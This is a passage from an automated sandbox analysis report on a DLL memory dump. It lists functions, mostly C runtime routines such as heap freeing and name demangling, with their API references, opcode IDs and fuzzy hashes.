                                • Instruction Fuzzy Hash: A11181B33441019FD714EF59DC82EA6B3DEFB89231B258166ED08CB305E635E841C7A0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DDCE730, Relevance: .1, Instructions: 55COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.495143690.000000006DDCE000.00000040.00020000.sdmp, Offset: 6DDCE000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
                                • Instruction ID: 7a8836888b2302955b76f2931b70707662734cc8112c167da8cbfed6f29d07e1
                                • Opcode Fuzzy Hash: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
                                • Instruction Fuzzy Hash: 7B0126B6314241CFD705EB19D985D79BBECEBC2324F15C07EE446C3656D134E441C912
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DDB227F, Relevance: .0, Instructions: 22COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ecb42c1d12d40f1a0af8a500848935c0d28a4c93e3a3cea091b94fc400f67602
                                • Instruction ID: 359ee653edfd21f548a2fbeabe670b61eb05251096046e6809f2e2494d3500e4
                                • Opcode Fuzzy Hash: ecb42c1d12d40f1a0af8a500848935c0d28a4c93e3a3cea091b94fc400f67602
                                • Instruction Fuzzy Hash: A9E08CB2911228EBCB20EB88C900E9AF7FCEB46A48B51099AB602D3500C270EE01C7D0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD94296, Relevance: 35.3, APIs: 19, Strings: 1, Instructions: 339COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: Name::operator+$NameName::$Decorator::getName::operator|=ReturnTypeoperator+
                                • String ID: )
                                • API String ID: 1186856153-2427484129
                                • Opcode ID: dcf5b4da51cef750e4ae8df36a058142d1d408c272480f5e88e43424202cc152
                                • Instruction ID: 3bc7330bb742d465ff6f13a91f0681dca24833b01e951d3761dc80f48b1512f1
                                • Opcode Fuzzy Hash: dcf5b4da51cef750e4ae8df36a058142d1d408c272480f5e88e43424202cc152
                                • Instruction Fuzzy Hash: 83C182B1914209AFDF04EFE8D890EED7BB9BB09314F014159F265AF281DB32A545CB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD95561, Relevance: 19.8, APIs: 13, Instructions: 301COMMON
                                Download Yara Rule
                                APIs
                                • DName::operator+.LIBCMT ref: 6DD955CC
                                • DName::operator+.LIBCMT ref: 6DD95702
                                  • Part of subcall function 6DD9148F: shared_ptr.LIBCMT ref: 6DD914AB
                                • DName::operator+.LIBCMT ref: 6DD9574E
                                • DName::operator+.LIBCMT ref: 6DD9575D
                                • DName::operator+.LIBCMT ref: 6DD956B8
                                  • Part of subcall function 6DD96CAB: DName::operator=.LIBVCRUNTIME ref: 6DD96D3A
                                • DName::operator+.LIBCMT ref: 6DD9588A
                                • DName::operator=.LIBVCRUNTIME ref: 6DD958CA
                                • DName::DName.LIBVCRUNTIME ref: 6DD958E2
                                • DName::operator+.LIBCMT ref: 6DD958F1
                                • DName::operator+.LIBCMT ref: 6DD958FD
                                  • Part of subcall function 6DD96CAB: Replicator::operator[].LIBVCRUNTIME ref: 6DD96CE8
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: Name::operator+$Name::operator=$NameName::Replicator::operator[]shared_ptr
                                • String ID:
                                • API String ID: 1026175760-0
                                • Opcode ID: eb022362e71cc8342685466d94dada893d1cac2601da5eb31aa76c4c9c2b1fcd
                                • Instruction ID: a2cccca70907ee3c5f19b957b453099357f33cb8de4312c8cd4831cb50355f6e
                                • Opcode Fuzzy Hash: eb022362e71cc8342685466d94dada893d1cac2601da5eb31aa76c4c9c2b1fcd
                                • Instruction Fuzzy Hash: BAC16F71908205DFDB14EFA8D854BFEBBF9BB09305F00446DF659AB281EB36A644CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DDB7C68, Relevance: 19.6, APIs: 13, Instructions: 113COMMON
                                Download Yara Rule
                                APIs
                                • ___free_lconv_mon.LIBCMT ref: 6DDB7CAC
                                  • Part of subcall function 6DDB92BB: _free.LIBCMT ref: 6DDB92D8
                                  • Part of subcall function 6DDB92BB: _free.LIBCMT ref: 6DDB92EA
                                  • Part of subcall function 6DDB92BB: _free.LIBCMT ref: 6DDB92FC
                                  • Part of subcall function 6DDB92BB: _free.LIBCMT ref: 6DDB930E
                                  • Part of subcall function 6DDB92BB: _free.LIBCMT ref: 6DDB9320
                                  • Part of subcall function 6DDB92BB: _free.LIBCMT ref: 6DDB9332
                                  • Part of subcall function 6DDB92BB: _free.LIBCMT ref: 6DDB9344
                                  • Part of subcall function 6DDB92BB: _free.LIBCMT ref: 6DDB9356
                                  • Part of subcall function 6DDB92BB: _free.LIBCMT ref: 6DDB9368
                                  • Part of subcall function 6DDB92BB: _free.LIBCMT ref: 6DDB937A
                                  • Part of subcall function 6DDB92BB: _free.LIBCMT ref: 6DDB938C
                                  • Part of subcall function 6DDB92BB: _free.LIBCMT ref: 6DDB939E
                                  • Part of subcall function 6DDB92BB: _free.LIBCMT ref: 6DDB93B0
                                • _free.LIBCMT ref: 6DDB7CA1
                                  • Part of subcall function 6DDAD7F5: HeapFree.KERNEL32(00000000,00000000,?,6DDB9A83,?,00000000,?,?,?,6DDB9D87,?,00000007,?,?,6DDB7DFF,?), ref: 6DDAD80B
                                  • Part of subcall function 6DDAD7F5: GetLastError.KERNEL32(?,?,6DDB9A83,?,00000000,?,?,?,6DDB9D87,?,00000007,?,?,6DDB7DFF,?,?), ref: 6DDAD81D
                                • _free.LIBCMT ref: 6DDB7CC3
                                • _free.LIBCMT ref: 6DDB7CD8
                                • _free.LIBCMT ref: 6DDB7CE3
                                • _free.LIBCMT ref: 6DDB7D05
                                • _free.LIBCMT ref: 6DDB7D18
                                • _free.LIBCMT ref: 6DDB7D26
                                • _free.LIBCMT ref: 6DDB7D31
                                • _free.LIBCMT ref: 6DDB7D69
                                • _free.LIBCMT ref: 6DDB7D70
                                • _free.LIBCMT ref: 6DDB7D8D
                                • _free.LIBCMT ref: 6DDB7DA5
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                • String ID:
                                • API String ID: 161543041-0
                                • Opcode ID: bd37b72ab5bb8c4c4b12126f2e4ea6c91c66e8b1b75bb6d81f23fe8889293b9b
                                • Instruction ID: a933f6890e5826e287bf5ae7985ce20825720a477a5235f7377cd321d71c8d6b
                                • Opcode Fuzzy Hash: bd37b72ab5bb8c4c4b12126f2e4ea6c91c66e8b1b75bb6d81f23fe8889293b9b
                                • Instruction Fuzzy Hash: 86314DB1908702FFE724AB39D944B6A73E9EB44258F118419F55A96151FF30E885C760
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD8FE7A, Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 308COMMON
                                Download Yara Rule
                                APIs
                                • IsInExceptionSpec.LIBVCRUNTIME ref: 6DD8FF75
                                • type_info::operator==.LIBVCRUNTIME ref: 6DD8FF9C
                                • ___TypeMatch.LIBVCRUNTIME ref: 6DD900A8
                                • CatchIt.LIBVCRUNTIME ref: 6DD900FD
                                • IsInExceptionSpec.LIBVCRUNTIME ref: 6DD90183
                                • _UnwindNestedFrames.LIBCMT ref: 6DD9020A
                                • CallUnexpected.LIBVCRUNTIME ref: 6DD90225
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                • String ID: csm$csm$csm
                                • API String ID: 4234981820-393685449
                                • Opcode ID: 2f1c85efa4cb412bdc67dfa1e91033192bb6a181564d1094bfa275424c44ec40
                                • Instruction ID: f1e6006f30fc31db39b1b4587966896a6ac98a23e3aaaa0413067bbbea9f6808
                                • Opcode Fuzzy Hash: 2f1c85efa4cb412bdc67dfa1e91033192bb6a181564d1094bfa275424c44ec40
                                • Instruction Fuzzy Hash: 99C1893180421ADFCF16EFA9E8809AEBBB5FF04354F11405AF914AF216D332DA55CBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD96053, Relevance: 15.3, APIs: 10, Instructions: 253COMMON
                                Download Yara Rule
                                APIs
                                • DName::operator+.LIBCMT ref: 6DD9611F
                                • UnDecorator::getSignedDimension.LIBCMT ref: 6DD9612A
                                • DName::DName.LIBVCRUNTIME ref: 6DD9613B
                                • UnDecorator::getSignedDimension.LIBCMT ref: 6DD961E0
                                • UnDecorator::getSignedDimension.LIBCMT ref: 6DD961FD
                                • UnDecorator::getSignedDimension.LIBCMT ref: 6DD9621A
                                • DName::operator+.LIBCMT ref: 6DD9622F
                                • UnDecorator::getSignedDimension.LIBCMT ref: 6DD96252
                                • swprintf.LIBCMT ref: 6DD962C3
                                • DName::operator+.LIBCMT ref: 6DD9631A
                                  • Part of subcall function 6DD941AA: DName::DName.LIBVCRUNTIME ref: 6DD941CE
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: Decorator::getDimensionSigned$Name::operator+$NameName::$swprintf
                                • String ID:
                                • API String ID: 3689813335-0
                                • Opcode ID: 7e0d4f837fa631bd79aec53c5172e83d49e4fe8cc1b47f20200fd2536e555688
                                • Instruction ID: 143d6844e19f7cc4b4b107aba87f51963a609be733fc7fe547bf6fca3a3b331c
                                • Opcode Fuzzy Hash: 7e0d4f837fa631bd79aec53c5172e83d49e4fe8cc1b47f20200fd2536e555688
                                • Instruction Fuzzy Hash: DB81B372D5420ADAEB11FBF4C955BFE77B8AB06314F458019F214AF082DB7A6604CBE1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DDADB64, Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                Download Yara Rule
                                APIs
                                • _free.LIBCMT ref: 6DDADB7A
                                  • Part of subcall function 6DDAD7F5: HeapFree.KERNEL32(00000000,00000000,?,6DDB9A83,?,00000000,?,?,?,6DDB9D87,?,00000007,?,?,6DDB7DFF,?), ref: 6DDAD80B
                                  • Part of subcall function 6DDAD7F5: GetLastError.KERNEL32(?,?,6DDB9A83,?,00000000,?,?,?,6DDB9D87,?,00000007,?,?,6DDB7DFF,?,?), ref: 6DDAD81D
                                • _free.LIBCMT ref: 6DDADB86
                                • _free.LIBCMT ref: 6DDADB91
                                • _free.LIBCMT ref: 6DDADB9C
                                • _free.LIBCMT ref: 6DDADBA7
                                • _free.LIBCMT ref: 6DDADBB2
                                • _free.LIBCMT ref: 6DDADBBD
                                • _free.LIBCMT ref: 6DDADBC8
                                • _free.LIBCMT ref: 6DDADBD3
                                • _free.LIBCMT ref: 6DDADBE1
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: c756b1fab33d3bf3e00751e928d3ea7f89694edadca7b19e69b415233efbbfbd
                                • Instruction ID: 53d34b90cf320488d7e3b57f9225b25d1181a56cc02eb634cd020c329aad0c75
                                • Opcode Fuzzy Hash: c756b1fab33d3bf3e00751e928d3ea7f89694edadca7b19e69b415233efbbfbd
                                • Instruction Fuzzy Hash: 7521BA7A904108FFCB15EFA8C980DDD7BB8BF48254F058166FA159B120FB31EA45CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD96CAB, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 180COMMON
                                Download Yara Rule
                                APIs
                                • Replicator::operator[].LIBVCRUNTIME ref: 6DD96CE8
                                • DName::operator=.LIBVCRUNTIME ref: 6DD96D3A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: Name::operator=Replicator::operator[]
                                • String ID: @
                                • API String ID: 3211817929-2766056989
                                • Opcode ID: 0245af66ce838d22d75d313f946eda04cb0b34331c4e3da893dab8caa9b05792
                                • Instruction ID: b81fe77fca27824ec822c52a6877e7d82efa9f00715cc0e22d6a50f1cb8977cd
                                • Opcode Fuzzy Hash: 0245af66ce838d22d75d313f946eda04cb0b34331c4e3da893dab8caa9b05792
                                • Instruction Fuzzy Hash: E7618371D0420A9FDF05EFE9D840BFEBBB9AB19314F01805AF655AB281DB35A505CBE0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD92831, Relevance: 10.7, APIs: 7, Instructions: 151COMMON
                                Download Yara Rule
                                APIs
                                • DName::operator+.LIBCMT ref: 6DD928BF
                                • DName::operator+.LIBCMT ref: 6DD92912
                                  • Part of subcall function 6DD9148F: shared_ptr.LIBCMT ref: 6DD914AB
                                  • Part of subcall function 6DD9137E: DName::operator+.LIBCMT ref: 6DD9139F
                                • DName::operator+.LIBCMT ref: 6DD92903
                                • DName::operator+.LIBCMT ref: 6DD92963
                                • DName::operator+.LIBCMT ref: 6DD92970
                                • DName::operator+.LIBCMT ref: 6DD929B7
                                • DName::operator+.LIBCMT ref: 6DD929C4
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: Name::operator+$shared_ptr
                                • String ID:
                                • API String ID: 1037112749-0
                                • Opcode ID: 1b63ac0a6897beb90a0d6d68df8ded3ab84be40565715fd849fbdaf7bfc32554
                                • Instruction ID: d003d69d6f9c5652d810c38568effeb99680e8836f4474fdade253ad69cabb90
                                • Opcode Fuzzy Hash: 1b63ac0a6897beb90a0d6d68df8ded3ab84be40565715fd849fbdaf7bfc32554
                                • Instruction Fuzzy Hash: 70517172D04219ABDF15EBE4C895EEEBBBCAB08714F41415AF605AB180DB31A644CBB0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD93B4F, Relevance: 10.6, APIs: 7, Instructions: 102COMMON
                                Download Yara Rule
                                APIs
                                • DName::DName.LIBVCRUNTIME ref: 6DD93B77
                                • DName::DName.LIBVCRUNTIME ref: 6DD93BA4
                                  • Part of subcall function 6DD91130: __aulldvrm.LIBCMT ref: 6DD91161
                                • DName::operator+.LIBCMT ref: 6DD93BBF
                                • DName::DName.LIBVCRUNTIME ref: 6DD93BDC
                                • DName::DName.LIBVCRUNTIME ref: 6DD93C0C
                                • DName::DName.LIBVCRUNTIME ref: 6DD93C16
                                • DName::DName.LIBVCRUNTIME ref: 6DD93C3D
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: NameName::$Name::operator+__aulldvrm
                                • String ID:
                                • API String ID: 4069495278-0
                                • Opcode ID: f640472b625968b30a545dd7155f1bd46ae89c86141ddc9374c6ffe77d3c86c2
                                • Instruction ID: c0c80dadad5681e2fd4a8541b211267dff2b8d3b434790425631ade5f46f2f94
                                • Opcode Fuzzy Hash: f640472b625968b30a545dd7155f1bd46ae89c86141ddc9374c6ffe77d3c86c2
                                • Instruction Fuzzy Hash: CF31A1719486499ADF09EFA8C850BEDBBBABF06318F044049F15A6F281D733A546CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DDB9D6E, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 6DDB9A59: _free.LIBCMT ref: 6DDB9A7E
                                • _free.LIBCMT ref: 6DDB9DBC
                                  • Part of subcall function 6DDAD7F5: HeapFree.KERNEL32(00000000,00000000,?,6DDB9A83,?,00000000,?,?,?,6DDB9D87,?,00000007,?,?,6DDB7DFF,?), ref: 6DDAD80B
                                  • Part of subcall function 6DDAD7F5: GetLastError.KERNEL32(?,?,6DDB9A83,?,00000000,?,?,?,6DDB9D87,?,00000007,?,?,6DDB7DFF,?,?), ref: 6DDAD81D
                                • _free.LIBCMT ref: 6DDB9DC7
                                • _free.LIBCMT ref: 6DDB9DD2
                                • _free.LIBCMT ref: 6DDB9E26
                                • _free.LIBCMT ref: 6DDB9E31
                                • _free.LIBCMT ref: 6DDB9E3C
                                • _free.LIBCMT ref: 6DDB9E47
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 7ac9138cef5ce3a258dca3bbd8fd3fddd9dd8b90217114defab4aa152b3db568
                                • Instruction ID: 3b5805d20bffd77da7ecd3655d8c5e71ffb0b446aa9d66d3a0b3e7c565e004a2
                                • Opcode Fuzzy Hash: 7ac9138cef5ce3a258dca3bbd8fd3fddd9dd8b90217114defab4aa152b3db568
                                • Instruction Fuzzy Hash: 211193B1649B44BAD630B7F0CC85FCB779C5F84718F824814B79B6A051FB78B50597A0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DDBD915, Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMON
                                Download Yara Rule
                                APIs
                                • GetConsoleCP.KERNEL32(00000000,00000001,00000000), ref: 6DDBD95D
                                • __fassign.LIBCMT ref: 6DDBDB3C
                                • __fassign.LIBCMT ref: 6DDBDB59
                                • WriteFile.KERNEL32(?,6DDB55A5,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6DDBDBA1
                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6DDBDBE1
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6DDBDC8D
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: FileWrite__fassign$ConsoleErrorLast
                                • String ID:
                                • API String ID: 4031098158-0
                                • Opcode ID: fbdd26d0af1d681f231f26117ee54b2509b134c03b3c37f15081effc01612c4e
                                • Instruction ID: ef4a8ec2b8021b0094da4c4d9bcc1089d803eb5cd3b2892dd11b659f5f933e07
                                • Opcode Fuzzy Hash: fbdd26d0af1d681f231f26117ee54b2509b134c03b3c37f15081effc01612c4e
                                • Instruction Fuzzy Hash: C0D1BEB1D042599FCF15DFA8C880AEDBBB5BF89318F244159E857BB242D731A906CF60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DDA1545, Relevance: 9.3, APIs: 6, Instructions: 276COMMON
                                Download Yara Rule
                                APIs
                                • __allrem.LIBCMT ref: 6DDA16CD
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6DDA16E9
                                • __allrem.LIBCMT ref: 6DDA1700
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6DDA171E
                                • __allrem.LIBCMT ref: 6DDA1735
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6DDA1753
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                • String ID:
                                • API String ID: 1992179935-0
                                • Opcode ID: 043adf15f1920c78ca3499397aa1f2aa39dfe4a67477a4671773f39f52257892
                                • Instruction ID: bf5ae35e15b89cfaac690e1f5b35944bd0f07ca26befe604f5de0ae118964b02
                                • Opcode Fuzzy Hash: 043adf15f1920c78ca3499397aa1f2aa39dfe4a67477a4671773f39f52257892
                                • Instruction Fuzzy Hash: EF81C5B2A08706EBE710BF69CC40B5A73F9AF45724F1CC629F555D7291E770D9018BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DDA2AC0, Relevance: 9.2, APIs: 6, Instructions: 221COMMON
                                Download Yara Rule
                                APIs
                                • _free.LIBCMT ref: 6DDA2B50
                                • _free.LIBCMT ref: 6DDA2B6B
                                • _free.LIBCMT ref: 6DDA2B76
                                • _free.LIBCMT ref: 6DDA2C83
                                  • Part of subcall function 6DDAD792: RtlAllocateHeap.NTDLL(00000008,6DDCB004,00000000), ref: 6DDAD7D3
                                • _free.LIBCMT ref: 6DDA2C58
                                  • Part of subcall function 6DDAD7F5: HeapFree.KERNEL32(00000000,00000000,?,6DDB9A83,?,00000000,?,?,?,6DDB9D87,?,00000007,?,?,6DDB7DFF,?), ref: 6DDAD80B
                                  • Part of subcall function 6DDAD7F5: GetLastError.KERNEL32(?,?,6DDB9A83,?,00000000,?,?,?,6DDB9D87,?,00000007,?,?,6DDB7DFF,?,?), ref: 6DDAD81D
                                • _free.LIBCMT ref: 6DDA2C79
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: _free$Heap$AllocateErrorFreeLast
                                • String ID:
                                • API String ID: 4150789928-0
                                • Opcode ID: 6e74a1fc58ebaa20db2b51548e9e641894ebb50a1363505178dbb128643d0597
                                • Instruction ID: 5fe448ed5c3a4e0616f58bdce7bafeca6852f350e408438cac5bc3cb9f6d9b78
                                • Opcode Fuzzy Hash: 6e74a1fc58ebaa20db2b51548e9e641894ebb50a1363505178dbb128643d0597
                                • Instruction Fuzzy Hash: FC515B36608212ABDB24BF6AD840BBA7BB5DF85718B19C05AF9459B245FA31DD03C260
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD96B55, Relevance: 9.1, APIs: 6, Instructions: 120COMMON
                                Download Yara Rule
                                APIs
                                • DName::operator+.LIBCMT ref: 6DD96B99
                                • DName::operator+.LIBCMT ref: 6DD96BA5
                                  • Part of subcall function 6DD9148F: shared_ptr.LIBCMT ref: 6DD914AB
                                • DName::operator+=.LIBCMT ref: 6DD96C65
                                  • Part of subcall function 6DD95561: DName::operator+.LIBCMT ref: 6DD955CC
                                  • Part of subcall function 6DD95561: DName::operator+.LIBCMT ref: 6DD9588A
                                  • Part of subcall function 6DD9137E: DName::operator+.LIBCMT ref: 6DD9139F
                                • DName::operator+.LIBCMT ref: 6DD96C20
                                  • Part of subcall function 6DD914E7: DName::operator=.LIBVCRUNTIME ref: 6DD91508
                                • DName::DName.LIBVCRUNTIME ref: 6DD96C89
                                • DName::operator+.LIBCMT ref: 6DD96C95
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: Name::operator+$NameName::Name::operator+=Name::operator=shared_ptr
                                • String ID:
                                • API String ID: 2795783184-0
                                • Opcode ID: 13ef5be9d1cd2c225e32df2fbc6a87f6ddb368bdcce32cad35d6054692fe966b
                                • Instruction ID: 7fdb905f841e9caf2cd2c6b5450ac4586cf4e8f7d2b5b892b264facaaea374d0
                                • Opcode Fuzzy Hash: 13ef5be9d1cd2c225e32df2fbc6a87f6ddb368bdcce32cad35d6054692fe966b
                                • Instruction Fuzzy Hash: E94171B16042459FDF11FFA8C894BAD7BFAEB0A304F404058F2869F281D7366941CBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD95913, Relevance: 9.1, APIs: 6, Instructions: 95COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 6DD96CAB: Replicator::operator[].LIBVCRUNTIME ref: 6DD96CE8
                                • DName::operator=.LIBVCRUNTIME ref: 6DD959B9
                                  • Part of subcall function 6DD95561: DName::operator+.LIBCMT ref: 6DD955CC
                                  • Part of subcall function 6DD95561: DName::operator+.LIBCMT ref: 6DD9588A
                                • DName::operator+.LIBCMT ref: 6DD95974
                                • DName::operator+.LIBCMT ref: 6DD95980
                                • DName::DName.LIBVCRUNTIME ref: 6DD959CD
                                • DName::operator+.LIBCMT ref: 6DD959DC
                                • DName::operator+.LIBCMT ref: 6DD959E8
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]
                                • String ID:
                                • API String ID: 955152517-0
                                • Opcode ID: 496f51c797e2864bd6439aa2f0855c42c3b06185d29359c6efec58afd0f071f5
                                • Instruction ID: df15ae42a4517163908004a4c62b7376aaad7bed11f84941619b474064d7b0c5
                                • Opcode Fuzzy Hash: 496f51c797e2864bd6439aa2f0855c42c3b06185d29359c6efec58afd0f071f5
                                • Instruction Fuzzy Hash: AB3170B1604205AFDB14EFA8C490AFEBBF9BF59314F00446DF6869B381D732A504CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD8FB0C, Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32(?,?,6DD8F8E3,6DD8E4FE,6DD8DCB2), ref: 6DD8FB1A
                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6DD8FB28
                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6DD8FB41
                                • SetLastError.KERNEL32(00000000,?,6DD8F8E3,6DD8E4FE,6DD8DCB2), ref: 6DD8FB93
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: ErrorLastValue___vcrt_
                                • String ID:
                                • API String ID: 3852720340-0
                                • Opcode ID: b471cb8de6a6d987661f8975e78ec845cea9456932b257d85518338e302a2223
                                • Instruction ID: 056e3a21d50add86f8f5ae3caf247c1b1e7c3ae45a75b2fd02d045960584bcb0
                                • Opcode Fuzzy Hash: b471cb8de6a6d987661f8975e78ec845cea9456932b257d85518338e302a2223
                                • Instruction Fuzzy Hash: C501D832A5D713BEBB1337B8AC94B7627BCEB077797224229F724461D2FF21A8055150
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD941AA, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: NameName::
                                • String ID: A
                                • API String ID: 1333004437-3554254475
                                • Opcode ID: 88221a1346b14b8baba43cc05fd839122da10464b9d690d44298a122629f250e
                                • Instruction ID: b9dabc97a794ea4c6d4dc001bc447649d6a989d7a4d6b23cfd64b551792732fd
                                • Opcode Fuzzy Hash: 88221a1346b14b8baba43cc05fd839122da10464b9d690d44298a122629f250e
                                • Instruction Fuzzy Hash: 42318170908259DBDF14EFE8C844BADBBB9BF0A304F01405AF565AF242C772A945CB59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DDB324C, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                                Download Yara Rule
                                Strings
                                • C:\Windows\SYSTEM32\loaddll32.exe, xrefs: 6DDB3251
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID: C:\Windows\SYSTEM32\loaddll32.exe
                                • API String ID: 0-1872383224
                                • Opcode ID: 1739bfbb52f9c58474686c46a0dd1fc0d5ff336696fa859cfa3f611e20041bd0
                                • Instruction ID: ea183405e27440b2bcaa424a6488437a10b2ec7ae12dd354fb89d9dddf0023f9
                                • Opcode Fuzzy Hash: 1739bfbb52f9c58474686c46a0dd1fc0d5ff336696fa859cfa3f611e20041bd0
                                • Instruction Fuzzy Hash: 032198B1608606FFD710BF698C40E6B776DAF4536C7158514FA5A96250EB31EC0097B0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DDB1AA3, Relevance: 7.9, APIs: 5, Instructions: 373timeCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: _free$InformationTimeZone
                                • String ID:
                                • API String ID: 597776487-0
                                • Opcode ID: 17854222b8b32f584684b536cb7ff9c9833a230a22bd823f0e3971311890c7fe
                                • Instruction ID: 5b3f2af43a8a78ddf0132a5ec69353c74d8ac1f07fc6e83c5c5b89f87b64c237
                                • Opcode Fuzzy Hash: 17854222b8b32f584684b536cb7ff9c9833a230a22bd823f0e3971311890c7fe
                                • Instruction Fuzzy Hash: 38C15AB1A48106DFDB10BF78CC40BBABBBDAF86358F154159F592D7282E7319901CB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DDB97A8, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                Download Yara Rule
                                APIs
                                • _free.LIBCMT ref: 6DDB97C0
